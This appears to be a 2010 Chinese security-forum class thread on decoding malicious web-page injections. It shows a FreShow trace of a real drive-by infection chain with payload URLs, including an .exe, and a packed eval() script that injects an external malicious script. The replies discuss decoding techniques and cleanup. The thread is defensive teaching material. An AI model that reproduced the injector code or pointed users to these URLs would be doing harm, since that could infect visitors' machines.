瑞星卡卡安全论坛
networkedition - 2010-2-5 14:04:00
暗夜的雪 - 2010-2-5 14:05:00
Log is generated by FreShow.
[wide]http://bbs.yx007.com
[script]http://bbs.yx007.com/forumdata/cache/common.js?zbz
[object]http://bbs.xcdx169.net/include/log.js?ZUBQFIRA
[frame]http://game.hsw.cn/plus/img/logo.html?人06
[script]http://game.hsw.cn/plus/img/a.jpg
[object]http://www.xcrc114.com/photo/Data/74.exe
[script]http://game.hsw.cn/plus/img/b.jpg
[script]http://w.cnzz.com/c.php?id=30025099
哇哈哈~~~成功了~
networkedition - 2010-2-5 14:07:00
这个地址:http://bbs.yx007.com/forumdata/cache/common.js?zbz,里面有个eval,你尝试去解密这个eval。
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|ZUBQFIRA|log|include|net|bbs'.split('|'),0,{}));}
完颜无泪 - 2010-2-5 14:09:00
教程里面有讲啊:kaka6:
暗夜的雪 - 2010-2-5 14:10:00
哦!刚用了alert方法,发现直接在网页中输出了字符串~后来用的ty88提供的base62解出来了~ 呵呵 谢谢老师~
networkedition - 2010-2-5 14:12:00
alert在javascript里是个弹框的函数,为啥要将eval替换成alert,主要是防止解密时,将代码运行起来。通过弹框即可以将代码运行了,又不会导致代码运行后导致系统感染病毒。
暗夜的雪 - 2010-2-5 14:12:00
不行~ 按照讲义上的直接换成alert以后,代码全都直接输出在了网页中,没有对话框显示
networkedition - 2010-2-5 14:15:00
不是,练习题还没有出呢
穷小子cd - 2010-2-5 14:20:00
学习了,谢谢老师
暗夜的雪 - 2010-2-5 14:26:00
老师啊~ 挂马的原理是什么呢? 解出马之后是关闭服务器? 对于网页挂马后有什么处理措施呢?
networkedition - 2010-2-5 14:32:00
挂马主要是黑客用来盗号,获取更多的利益。简单的讲解:主要使用通过网站代码漏洞获取webshell后,上传后门文件从而控制网站,实施挂马。
WangAnwu - 2010-2-5 14:54:00
请问上述代码中的js是如何工作的?
暗夜的雪 - 2010-2-5 14:56:00
哦~ 也就是说黑客用某种漏洞控制了网站,然后往上弄了一些链接,而某些链接经过了加密措施,所以说需要网马解密是么? 那这个加密的链接地址我们费了9牛2虎的力气才解密出来,那浏览器怎么就能自己转到相应链接呢??找出源马地址以后是不是要报告给网站服务商来解决后门问题?
networkedition - 2010-2-5 14:56:00
:kaka6: 你的图看不到呀
梅罗 - 2010-2-5 14:58:00
老师 45期悬赏里啊 我用freshow 或者是decoder得出的源码是看不见底下的Document .write的,但是用Dreamweaver打开以后就可以看见那2个Document .write了 这个是编码方式的原因吗?还有45期网马解密的同时用freshow 和 decoder 在线获取的网站源码不同?又是什么原因呢?·能不能发个中文版的神器给我啊~~我找了好多地都找不到
暗夜的雪 - 2010-2-5 14:59:00
啊!居然有此方法 !!
networkedition - 2010-2-5 15:01:00
对的,找到恶意链接地址后,网站站长就可以及时处理清除,同时网站被入侵后也很可能是有漏洞了。需要进行更进一步的分析解决。
networkedition - 2010-2-5 15:04:00
不是,不用那么复杂,可以通过查找关键字的方法来进行查找,将代码复制到记事本,查找关键字:document.write或eval即可。或者可以通过redoce的执行下的,标出document.write或eval功能。
梅罗 - 2010-2-5 15:06:00
可是我找过了 根本没有这个关键字。。。是不是我的有问题 好像暗夜他们也找不到那个document.write,要不还是有点头绪的
networkedition - 2010-2-5 15:09:00
代码呢,把链接地址发上来也行。注意要禁用url
梅罗 - 2010-2-5 15:18:00
原帖由 networkedition 于 2010-2-5 15:09:00 发表
代码呢,把链接地址发上来也行。注意要禁用url
就是45期网马解密的那个。。
附件:
您所在的用户组无法下载或查看附件到这里就没有了 ~~那个document.write函数在最后~附件不让HTM上传 老师把RAR去掉,我在那个decoder里能找到document.write了
附件:
of.htm.RAR
迷失の坏坏 - 2010-2-5 15:25:00
来听课,老是有作业吗:kaka12:
networkedition - 2010-2-5 15:28:00
有呀,这个首先需要使用redoce的去除非键盘字符的功能,将代码进行处理,处理后再使用执行下的标出document.wirte功能。见下图:
附件:
您所在的用户组无法下载或查看附件
networkedition - 2010-2-5 15:29:00
没有作业,有练习题
梅罗 - 2010-2-5 15:48:00
恩 decoder里有 可是freshow显示不完~~不知道为什么
networkedition - 2010-2-5 15:51:00
原因是freshow无法获取到完整的代码,因为那个页面代码里有终止符,这个比较特殊。
hqvip - 2010-2-5 16:01:00
问题如下:
如果页面代码中有多个document.write(……)还要都替换掉吗? 有什么高效的方式吗?
比如hXXp://www.zhuoku.com 这个看着就比较头大:kaka6:
多谢老师的解答!
networkedition - 2010-2-5 16:27:00
具体问题具体分析,你发的这个网址未见异常。
ty88 - 2010-2-5 17:41:00
freshow目前的版本是1.5
这个版本已经出现了很长时间了,后来有人找到了BUG,
在代码中写入终止符之后freshow读取的代码便不完整。
原先的网马通过这个防止解密
ty88 - 2010-2-5 17:48:00
我错了。。。。突然发现多余代码没去掉。。。
附件:
您所在的用户组无法下载或查看附件
© 2000 - 2026 Rising Corp. Ltd.